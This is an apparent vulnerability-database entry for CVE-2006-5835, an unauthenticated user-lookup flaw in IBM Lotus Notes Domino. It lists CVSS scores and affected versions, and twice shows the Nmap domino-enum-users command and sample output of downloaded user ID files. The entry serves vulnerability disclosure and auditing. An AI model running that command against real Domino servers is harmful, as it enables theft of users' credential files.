5
CVSSv2

CVE-2006-5835

Published: 10/11/2006 Updated: 20/07/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 530
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

The Notes Remote Procedure Call (NRPC) protocol in IBM Lotus Notes Domino prior to 6.5.5 FP2 and 7.x prior to 7.0.2 does not require authentication to perform user lookups, which allows remote malicious users to obtain the user ID file.

Vulnerable Product Search on Vulmon Subscribe to Product

ibm lotus notes 5.0.3

ibm lotus notes 6.0

ibm lotus notes 6.0.1

ibm lotus notes 6.5.2

ibm lotus notes 6.5.3

ibm lotus notes 6.0.2

ibm lotus notes 6.0.3

ibm lotus notes 6.5.4

ibm lotus notes 6.5.5

ibm lotus notes 6.0.4

ibm lotus notes 6.0.5

ibm lotus notes 7.0

ibm lotus notes 7.0.1

ibm lotus notes 5.0.12

ibm lotus notes 6.5

ibm lotus notes 6.5.1

Nmap Scripts

domino-enum-users

Attempts to discover valid IBM Lotus Domino users and download their ID files by exploiting the CVE-2006-5835 vulnerability.

nmap --script domino-enum-users -p 1352 <host>

PORT STATE SERVICE REASON 1352/tcp open lotusnotes | domino-enum-users: | User "Patrik Karlsson" found, but not ID file could be downloaded | Successfully stored "FFlintstone" in /tmp/FFlintstone.id |_ Successfully stored "MJacksson" in /tmp/MJacksson.id
domino-enum-users

Attempts to discover valid IBM Lotus Domino users and download their ID files by exploiting the CVE-2006-5835 vulnerability.

nmap --script domino-enum-users -p 1352 <host>

PORT STATE SERVICE REASON 1352/tcp open lotusnotes | domino-enum-users: | User "Patrik Karlsson" found, but not ID file could be downloaded | Successfully stored "FFlintstone" in /tmp/FFlintstone.id |_ Successfully stored "MJacksson" in /tmp/MJacksson.id